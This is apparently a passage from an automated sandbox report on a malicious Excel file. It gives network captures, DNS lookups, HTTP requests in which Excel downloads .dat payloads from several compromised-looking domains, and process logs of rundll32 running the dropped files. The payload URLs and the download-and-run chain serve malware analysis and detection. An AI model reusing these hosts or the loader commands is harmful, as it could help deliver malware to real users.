                          Feb 24, 2021 11:54:21.641051054 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641068935 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641081095 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641093969 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641107082 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641130924 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641132116 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641145945 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641149044 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641153097 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641165018 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641192913 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641202927 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641206980 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641212940 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641225100 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641246080 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641272068 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641278028 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641282082 CET49170443192.168.2.22138.36.237.100
                          TimestampSource PortDest PortSource IPDest IP
                          Feb 24, 2021 11:54:13.501976013 CET5219753192.168.2.228.8.8.8
                          Feb 24, 2021 11:54:13.675236940 CET53521978.8.8.8192.168.2.22
                          Feb 24, 2021 11:54:14.341540098 CET5309953192.168.2.228.8.8.8
                          Feb 24, 2021 11:54:14.498265982 CET53530998.8.8.8192.168.2.22
                          Feb 24, 2021 11:54:15.374135971 CET5283853192.168.2.228.8.8.8
                          Feb 24, 2021 11:54:15.749438047 CET53528388.8.8.8192.168.2.22
                          Feb 24, 2021 11:54:17.745513916 CET6120053192.168.2.228.8.8.8
                          Feb 24, 2021 11:54:17.797508955 CET53612008.8.8.8192.168.2.22
                          Feb 24, 2021 11:54:17.805962086 CET4954853192.168.2.228.8.8.8
                          Feb 24, 2021 11:54:17.857635975 CET53495488.8.8.8192.168.2.22
                          Feb 24, 2021 11:54:18.077522039 CET5562753192.168.2.228.8.8.8
                          Feb 24, 2021 11:54:18.126564026 CET53556278.8.8.8192.168.2.22
                          Feb 24, 2021 11:54:18.146034956 CET5600953192.168.2.228.8.8.8
                          Feb 24, 2021 11:54:18.198153973 CET53560098.8.8.8192.168.2.22
                          Feb 24, 2021 11:54:18.511854887 CET6186553192.168.2.228.8.8.8
                          Feb 24, 2021 11:54:18.563889980 CET53618658.8.8.8192.168.2.22
                          Feb 24, 2021 11:54:18.577310085 CET5517153192.168.2.228.8.8.8
                          Feb 24, 2021 11:54:18.626219988 CET53551718.8.8.8192.168.2.22
                          Feb 24, 2021 11:54:21.980869055 CET5249653192.168.2.228.8.8.8
                          Feb 24, 2021 11:54:22.141863108 CET53524968.8.8.8192.168.2.22
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Feb 24, 2021 11:54:13.501976013 CET192.168.2.228.8.8.80x26d4Standard query (0)rzminc.comA (IP address)IN (0x0001)
                          Feb 24, 2021 11:54:14.341540098 CET192.168.2.228.8.8.80x437eStandard query (0)pathinanchilearthmovers.comA (IP address)IN (0x0001)
                          Feb 24, 2021 11:54:15.374135971 CET192.168.2.228.8.8.80xb648Standard query (0)jugueterialatorre.com.arA (IP address)IN (0x0001)
                          Feb 24, 2021 11:54:17.745513916 CET192.168.2.228.8.8.80x71ddStandard query (0)crt.sectigo.comA (IP address)IN (0x0001)
                          Feb 24, 2021 11:54:17.805962086 CET192.168.2.228.8.8.80xfc39Standard query (0)crt.sectigo.comA (IP address)IN (0x0001)
                          Feb 24, 2021 11:54:21.980869055 CET192.168.2.228.8.8.80xa9f6Standard query (0)biblicalisraeltours.comA (IP address)IN (0x0001)
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Feb 24, 2021 11:54:13.675236940 CET8.8.8.8192.168.2.220x26d4No error (0)rzminc.com72.52.227.180A (IP address)IN (0x0001)
                          Feb 24, 2021 11:54:14.498265982 CET8.8.8.8192.168.2.220x437eNo error (0)pathinanchilearthmovers.com162.241.80.6A (IP address)IN (0x0001)
                          Feb 24, 2021 11:54:15.749438047 CET8.8.8.8192.168.2.220xb648No error (0)jugueterialatorre.com.ar138.36.237.100A (IP address)IN (0x0001)
                          Feb 24, 2021 11:54:17.797508955 CET8.8.8.8192.168.2.220x71ddNo error (0)crt.sectigo.com91.199.212.52A (IP address)IN (0x0001)
                          Feb 24, 2021 11:54:17.857635975 CET8.8.8.8192.168.2.220xfc39No error (0)crt.sectigo.com91.199.212.52A (IP address)IN (0x0001)
                          Feb 24, 2021 11:54:22.141863108 CET8.8.8.8192.168.2.220xa9f6No error (0)biblicalisraeltours.com68.66.216.42A (IP address)IN (0x0001)
                          • rzminc.com
                          • pathinanchilearthmovers.com
                          • jugueterialatorre.com.ar
                          • biblicalisraeltours.com
                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.224916772.52.227.18080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampkBytes transferredDirectionData
                          Feb 24, 2021 11:54:13.848664999 CET0OUTGET /xklyulyijvn/44251495573726900000.dat HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: rzminc.com
                          Connection: Keep-Alive
                          Feb 24, 2021 11:54:14.320781946 CET1INHTTP/1.1 200 OK
                          Date: Wed, 24 Feb 2021 10:54:13 GMT
                          Server: Apache/2.4.46 (CentOS)
                          X-Powered-By: PHP/7.3.27
                          Upgrade: h2
                          Connection: keep-alive, close
                          Cache-Control: private, must-revalidate
                          Expires: Wed, 24 Feb 2021 10:54:13 GMT
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.2249168162.241.80.680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampkBytes transferredDirectionData
                          Feb 24, 2021 11:54:14.660200119 CET2OUTGET /eznwcdhx/44251495573726900000.dat HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: pathinanchilearthmovers.com
                          Connection: Keep-Alive
                          Feb 24, 2021 11:54:15.358295918 CET2INHTTP/1.1 200 OK
                          Date: Wed, 24 Feb 2021 10:54:14 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, Keep-Alive
                          Cache-Control: max-age=300
                          Expires: Wed, 24 Feb 2021 10:59:14 GMT
                          X-Endurance-Cache-Level: 2
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=75
                          Content-Type: text/html; charset=UTF-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.2249169138.36.237.10080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampkBytes transferredDirectionData
                          Feb 24, 2021 11:54:16.042413950 CET3OUTGET /xjzpfwc/44251495573726900000.dat HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: jugueterialatorre.com.ar
                          Connection: Keep-Alive
                          Feb 24, 2021 11:54:16.467619896 CET4INHTTP/1.1 301 Moved Permanently
                          Date: Wed, 24 Feb 2021 10:54:16 GMT
                          Server: Apache
                          X-Powered-By: PHP/7.3.20
                          Set-Cookie: e34c2f879dc85bcd47ed95fb5d2ec3c0=77f179d46abad0720483b69daa2a8633; path=/; secure; HttpOnly
                          Expires: Wed, 17 Aug 2005 00:00:00 GMT
                          Last-Modified: Wed, 24 Feb 2021 10:54:16 GMT
                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                          Pragma: no-cache
                          Location: https://jugueterialatorre.com.ar/xjzpfwc/44251495573726900000.dat
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          3192.168.2.224917472.52.227.18080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampkBytes transferredDirectionData
                          Feb 24, 2021 11:54:21.507049084 CET92OUTGET /fdzgprclatqo/44251495573726900000.dat HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: rzminc.com
                          Connection: Keep-Alive
                          Feb 24, 2021 11:54:21.965558052 CET121INHTTP/1.1 200 OK
                          Date: Wed, 24 Feb 2021 10:54:21 GMT
                          Server: Apache/2.4.46 (CentOS)
                          X-Powered-By: PHP/7.3.27
                          Upgrade: h2
                          Connection: keep-alive, close
                          Cache-Control: private, must-revalidate
                          Expires: Wed, 24 Feb 2021 10:54:21 GMT
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          4192.168.2.224917568.66.216.4280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampkBytes transferredDirectionData
                          Feb 24, 2021 11:54:22.296935081 CET122OUTGET /otmchxmxeg/44251495573726900000.dat HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: biblicalisraeltours.com
                          Connection: Keep-Alive
                          Feb 24, 2021 11:54:22.776196003 CET122INHTTP/1.1 200 OK
                          Connection: Keep-Alive
                          X-Powered-By: PHP/7.4.14
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 0
                          Date: Wed, 24 Feb 2021 10:54:22 GMT
                          Server: LiteSpeed
                          Strict-Transport-Security: max-age=63072000; includeSubDomains
                          X-Frame-Options: SAMEORIGIN
                          X-Content-Type-Options: nosniff
                          Content-Security-Policy: upgrade-insecure-requests
                          X-XSS-Protection: 1; mode=block
                          Referrer-Policy: no-referrer-when-downgrade


                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                          Feb 24, 2021 11:54:17.087672949 CET138.36.237.100443192.168.2.2249170CN=jugueterialatorre.com.ar CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Jun 02 02:00:00 CEST 2020 Mon Nov 06 13:23:33 CET 2017Thu Jun 03 01:59:59 CEST 2021 Sat Nov 06 13:23:33 CET 2027771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                          CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 06 13:23:33 CET 2017Sat Nov 06 13:23:33 CET 2027

                          Code Manipulations

                          Statistics

                          Behavior

                          Click to jump to process

                          System Behavior

                          Start time:11:53:35
                          Start date:24/02/2021
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                          Imagebase:0x13ff70000
                          File size:27641504 bytes
                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Start time:11:53:46
                          Start date:24/02/2021
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:rundll32 ..\JDFR.hdfgr,DllRegisterServer
                          Imagebase:0xff3d0000
                          File size:45568 bytes
                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Start time:11:53:47
                          Start date:24/02/2021
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:rundll32 ..\JDFR.hdfgr1,DllRegisterServer
                          Imagebase:0xff3d0000
                          File size:45568 bytes
                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Start time:11:53:48
                          Start date:24/02/2021
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:rundll32 ..\JDFR.hdfgr2,DllRegisterServer
                          Imagebase:0xff3d0000
                          File size:45568 bytes
                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Start time:11:53:48
                          Start date:24/02/2021
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:rundll32 ..\JDFR.hdfgr3,DllRegisterServer
                          Imagebase:0xff3d0000
                          File size:45568 bytes
                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Start time:11:53:49
                          Start date:24/02/2021
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:rundll32 ..\JDFR.hdfgr4,DllRegisterServer
                          Imagebase:0xff3d0000
                          File size:45568 bytes
                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Disassembly

                          Code Analysis